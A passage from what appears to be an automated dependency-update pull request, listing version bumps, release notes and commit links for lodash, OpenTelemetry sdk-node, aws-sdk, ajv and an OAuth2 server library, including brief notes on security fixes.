href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.21...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@opentelemetry/sdk-node` from 0.41.2 to 0.218.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/releases\"\u003e@​opentelemetry/sdk-node's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eexperimental/v0.218.0\u003c/h2\u003e\n\u003ch2\u003e0.218.0\u003c/h2\u003e\n\u003ch3\u003e:rocket: Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat(otlp-transformer): replace protobufjs metrics serialization with custom implementation \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6629\"\u003e#6625\u003c/a\u003e \u003ca href=\"https://github.com/pichlermarc\"\u003e\u003ccode\u003e@​pichlermarc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(configuration): show all config validation errors, if there are multiple \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6683\"\u003e#6683\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(sdk-node): allow startNodeSDK() without an arg \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6688\"\u003e#6688\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e:house: Internal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003erefactor(sdk-logs): alias \u003ccode\u003eLoggerProviderConfig\u003c/code\u003e to \u003ccode\u003eLoggerProviderOptions\u003c/code\u003e \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6691\"\u003e#6691\u003c/a\u003e \u003ca href=\"https://github.com/david-luna\"\u003e\u003ccode\u003e@​david-luna\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor(sdk-logs): use \u003ccode\u003eLogger.enabled()\u003c/code\u003e within \u003ccode\u003eLogger.emit()\u003c/code\u003e implementation \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6680\"\u003e#6680\u003c/a\u003e \u003ca href=\"https://github.com/david-luna\"\u003e\u003ccode\u003e@​david-luna\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eexperimental/v0.217.0\u003c/h2\u003e\n\u003ch2\u003e0.217.0\u003c/h2\u003e\n\u003ch3\u003e:rocket: Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat(otlp-transformer): replace protobufjs trace serialization with custom implementation \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6625\"\u003e#6625\u003c/a\u003e \u003ca href=\"https://github.com/pichlermarc\"\u003e\u003ccode\u003e@​pichlermarc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(configuration): auto-generate TypeScript types from OTel declarative config JSON schema (stable v1.0.0) using \u003ccode\u003ejson-schema-to-typescript\u003c/code\u003e and \u003ccode\u003eajv\u003c/code\u003e \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6533\"\u003e#6533\u003c/a\u003e \u003ca href=\"https://github.com/MikeGoldsmith\"\u003e\u003ccode\u003e@​MikeGoldsmith\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(configuration, sdk-node): \u003ccode\u003estartNodeSDK()\u003c/code\u003e code path now uses \u003ccode\u003elog_level\u003c/code\u003e configuration to setup a DiagConsoleLogger \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6668\"\u003e#6668\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eNote that allowed values for \u003ccode\u003elog_level\u003c/code\u003e in a configuration YAML file are \u003cem\u003enot\u003c/em\u003e the same set as for \u003ccode\u003eOTEL_LOG_LEVEL\u003c/code\u003e. Use \u003ccode\u003elog_level: trace\u003c/code\u003e to see \u003cem\u003eall\u003c/em\u003e logs (equivalent of \u003ccode\u003eOTEL_LOG_LEVEL=ALL\u003c/code\u003e). Use \u003ccode\u003elog_level: fatal\u003c/code\u003e to effectively disable the SDK's internal diagnostic logger (equivalent of \u003ccode\u003eOTEL_LOG_LEVEL=NONE\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eIf \u003ccode\u003elog_level\u003c/code\u003e is not specified, a diagnostic console logger at \u0026quot;info\u0026quot; level will be setup.\u003c/li\u003e\n\u003cli\u003eAn invalid YAML config file will now result in a noop OTel SDK.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e:bug: Bug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix(configuration): do not validate \u003ccode\u003eOTEL_CONFIG_FILE\u003c/code\u003e value before using it for file config \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6643\"\u003e#6643\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(configuration): improve how 'additionalProperties' in JSON schema is translated to TS types \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6650\"\u003e#6650\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(configuration): remove stripMinItems and preprocessNullArrays from validation/parsing \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6657\"\u003e#6657\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(configuration): improve handling of enums in generated types \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6659\"\u003e#6659\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(configuration): improve the technique for removing '| null' on types the JSON Schema \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6662\"\u003e#6662\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(sampler-jaeger-remote): add missing axios dep \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6656\"\u003e#6656\u003c/a\u003e \u003ca href=\"https://github.com/trentm\"\u003e\u003ccode\u003e@​trentm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(exporter-prometheus): handle malformed URLs in Prometheus exporter request handler \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6674\"\u003e#6674\u003c/a\u003e \u003ca href=\"https://github.com/homanp\"\u003e\u003ccode\u003e@​homanp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eexperimental/v0.216.0\u003c/h2\u003e\n\u003ch2\u003e0.216.0\u003c/h2\u003e\n\u003ch3\u003e:rocket: Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat(sdk-node): wire attribute_keys from declarative configuration to ViewOptions.attributesProcessors \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6427\"\u003e#6427\u003c/a\u003e \u003ca href=\"https://github.com/ravitheja4531-cell\"\u003e\u003ccode\u003e@​ravitheja4531-cell\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(sdk-node): set TracerProvider in startNodeSDK() \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6607\"\u003e#6607\u003c/a\u003e \u003ca href=\"https://github.com/maryliag\"\u003e\u003ccode\u003e@​maryliag\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e:bug: Bug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix(instrumentation-xml-http-request): avoid unwrapping \u003ccode\u003eXMLHttpRequest\u003c/code\u003e API when disabling \u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/pull/6611\"\u003e#6611\u003c/a\u003e \u003ca href=\"https://github.com/david-luna\"\u003e\u003ccode\u003e@​david-luna\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(instrumentation-fetch): tolerate non-writable \u003ccode\u003eglobalThis.fetch\u003c/code\u003e and fix premature \u003ccode\u003e_isEnabled\u003c/code\u003e / \u003ccode\u003e_isFetchPatched\u003c/code\u003e flips in \u003ccode\u003eenable()\u003c/code\u003e \u003ca href=\"https://github.com/brunorodmoreira\"\u003e\u003ccode\u003e@​brunorodmoreira\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/06ad0eaaecbd49f5ead871325f852cc2a3454079\"\u003e\u003ccode\u003e06ad0ea\u003c/code\u003e\u003c/a\u003e chore: prepare next release (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6703\"\u003e#6703\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/38ca257e64ebd13f5603d5539f8a48d6d9232037\"\u003e\u003ccode\u003e38ca257\u003c/code\u003e\u003c/a\u003e feat(otlp-transformer): replace protobufjs metrics serialization with custom ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/013c60085b84351a4c1e4e4f79e3dd67c56661cd\"\u003e\u003ccode\u003e013c600\u003c/code\u003e\u003c/a\u003e chore: prepare next release (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6699\"\u003e#6699\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/b7a0c63bde39d7916fdb73cbb3d64cf1c93282c5\"\u003e\u003ccode\u003eb7a0c63\u003c/code\u003e\u003c/a\u003e feat(semantic-conventions): update semantic conventions to v1.41.1 (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6695\"\u003e#6695\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/774143b2c6667c6537c000ab48ea5ce998278ca0\"\u003e\u003ccode\u003e774143b\u003c/code\u003e\u003c/a\u003e chore(renovate): add minimumReleaseAge to config (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6697\"\u003e#6697\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/e0dafe0d9fadaccf7dd8d7b02dd85531356e2ac1\"\u003e\u003ccode\u003ee0dafe0\u003c/code\u003e\u003c/a\u003e fix(otlp-exporter-base): remove brackets from IPv6 hostname in HTTP transport...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/f804c93d1d6d903036b8bf38f8c3713dbbaf0360\"\u003e\u003ccode\u003ef804c93\u003c/code\u003e\u003c/a\u003e chore(deps): update github/codeql-action digest to 68bde55 (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6682\"\u003e#6682\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/95e48e7afcc475ded350b95b43070c54591ecbbb\"\u003e\u003ccode\u003e95e48e7\u003c/code\u003e\u003c/a\u003e refactor(sdk-logs): alias \u003ccode\u003eLoggerProviderConfig\u003c/code\u003e to \u003ccode\u003eLoggerProviderOptions\u003c/code\u003e (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/907b627d9ada25844b0f06551ecd9bbda5c0ea4f\"\u003e\u003ccode\u003e907b627\u003c/code\u003e\u003c/a\u003e feat(sdk-node): allow startNodeSDK() without an arg (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6688\"\u003e#6688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/commit/0d1526198fafe7f90078ff353103d0427e6c64d4\"\u003e\u003ccode\u003e0d15261\u003c/code\u003e\u003c/a\u003e docs: Add SIG meeting info and welcoming language (\u003ca href=\"https://redirect.github.com/open-telemetry/opentelemetry-js/issues/6689\"\u003e#6689\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/open-telemetry/opentelemetry-js/compare/experimental/v0.41.2...experimental/v0.218.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​opentelemetry/sdk-node\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `aws-sdk` from 2.1358.0 to 2.1693.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-js/releases\"\u003eaws-sdk's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eRelease v2.1693.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1692.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1691.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1690.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1689.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1688.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1687.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1686.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1685.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1684.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1683.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1682.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1681.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1680.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1679.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1678.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003ch2\u003eRelease v2.1677.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/aws/aws-sdk-js/blob/master/CHANGELOG.md\"\u003echangelog\u003c/a\u003e for more information.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/9d3c66eca8c4416a9d347d0703f27b65775d65ef\"\u003e\u003ccode\u003e9d3c66e\u003c/code\u003e\u003c/a\u003e Updates SDK to v2.1693.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/c039567cee58b50a44f53f30318fa21f36c42ecc\"\u003e\u003ccode\u003ec039567\u003c/code\u003e\u003c/a\u003e test(client-elastictranscoder): remove feature test (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4711\"\u003e#4711\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/f5b1a6f0aebb477204d979091d654649f29ad9ce\"\u003e\u003ccode\u003ef5b1a6f\u003c/code\u003e\u003c/a\u003e docs: end-of-support (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4706\"\u003e#4706\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/657d6feb00447c8be1d65158a0ecc0585b70ed60\"\u003e\u003ccode\u003e657d6fe\u003c/code\u003e\u003c/a\u003e chore: use ssh private key for git sync (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4705\"\u003e#4705\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/c12585baeb9197158cd50975af66856617732aea\"\u003e\u003ccode\u003ec12585b\u003c/code\u003e\u003c/a\u003e chore: remove regression label management (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4699\"\u003e#4699\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/966fa6c316dbb11ca9277564ff7120e6b16467f4\"\u003e\u003ccode\u003e966fa6c\u003c/code\u003e\u003c/a\u003e Updates SDK to v2.1692.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/5d0e38adbbc1a3fd6e6bf7c48cd7e209e9eb0b5f\"\u003e\u003ccode\u003e5d0e38a\u003c/code\u003e\u003c/a\u003e Delete EC2 launch configuration e2e tests (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4685\"\u003e#4685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/b9ce3461a495dcf4f4a0be133e103d98130847a6\"\u003e\u003ccode\u003eb9ce346\u003c/code\u003e\u003c/a\u003e chore: fix issue config (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4683\"\u003e#4683\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/c06668172b233e0b2ded1afc48f0a11f6b79735c\"\u003e\u003ccode\u003ec066681\u003c/code\u003e\u003c/a\u003e Update issue template config and disable docs requests (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-js/issues/4682\"\u003e#4682\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-js/commit/163a7cfc86308e0b54245c04fb7b317bcd3893b0\"\u003e\u003ccode\u003e163a7cf\u003c/code\u003e\u003c/a\u003e Modified bug issue template to add checkbox to report potential regression. (...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-js/compare/v2.1358.0...v2.1693.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ajv` from 6.12.6 to 6.14.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/e3af0a723b4b7ad86eff43be355c706d31e0e915\"\u003e\u003ccode\u003ee3af0a7\u003c/code\u003e\u003c/a\u003e 6.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/b552ed66191eb338498df3196065c777e3bb71f2\"\u003e\u003ccode\u003eb552ed6\u003c/code\u003e\u003c/a\u003e add regExp option to address $data exploit via a regular expression (CVE-2025...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/72f228665859eed5e2be3a66f8c4a7aff6b34dcf\"\u003e\u003ccode\u003e72f2286\u003c/code\u003e\u003c/a\u003e docs: update v7 info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/231e52b3bca62559202b95e5fb5cee02145b226a\"\u003e\u003ccode\u003e231e52b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/ajv-validator/ajv/issues/1320\"\u003e#1320\u003c/a\u003e from philsturgeon/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/d3475fc20416c33fe030c8aa3b09fa411f325bbd\"\u003e\u003ccode\u003ed3475fc\u003c/code\u003e\u003c/a\u003e Add spectral, an AJV util from a sponsor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/413afe01f518ea74d1740a7cb211df787c585544\"\u003e\u003ccode\u003e413afe0\u003c/code\u003e\u003c/a\u003e docs: v7.0.0-beta.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/11e997bda2f3eecb445c1e5a07d96ef7e81c5f5d\"\u003e\u003ccode\u003e11e997b\u003c/code\u003e\u003c/a\u003e update readme for v7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/ajv-validator/ajv/compare/v6.12.6...v6.14.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@node-oauth/oauth2-server` from 5.1.0 to 5.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/node-oauth/node-oauth2-server/releases\"\u003e@​node-oauth/oauth2-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.3.0\u003c/h2\u003e\n\u003ch2\u003eAttention! This release fixes a reported vulnerability in the PKCE workflow!\u003c/h2\u003e\n\u003cp\u003eRead more here: \u003ca href=\"https://github.com/node-oauth/node-oauth2-server/security/advisories/GHSA-jhm7-29pj-4xvf\"\u003ehttps://github.com/node-oauth/node-oauth2-server/security/advisories/GHSA-jhm7-29pj-4xvf\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThis affects all versions below 5.3.0.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003ePKCE fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eproper enforcement of parameter ABNF\u003c/li\u003e\n\u003cli\u003efailed PKCE challenge revokes authorization code to prevent brute force\u003c/li\u003e\n\u003cli\u003echallenge comparison using timing safe comparison\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eplain\u003c/code\u003e challenges need explicit option \u003ccode\u003eenablePlainPKCE\u003c/code\u003e to be \u003ccode\u003etrue\u003c/code\u003e when creating a new server instance\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eExpose options property on OAuth2Server class types by \u003ca href=\"https://github.com/wille\"\u003e\u003ccode\u003e@​wille\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/378\"\u003enode-oauth/node-oauth2-server#378\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: bump node versions to minimum 20 by \u003ca href=\"https://github.com/jankapunkt\"\u003e\u003ccode\u003e@​jankapunkt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/383\"\u003enode-oauth/node-oauth2-server#383\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: pass proper arguments to createHash by \u003ca href=\"https://github.com/jankapunkt\"\u003e\u003ccode\u003e@​jankapunkt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/387\"\u003enode-oauth/node-oauth2-server#387\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocs: vitepress by \u003ca href=\"https://github.com/jankapunkt\"\u003e\u003ccode\u003e@​jankapunkt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/388\"\u003enode-oauth/node-oauth2-server#388\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/364\"\u003enode-oauth/node-oauth2-server#364\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump mocha from 11.7.1 to 11.7.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca 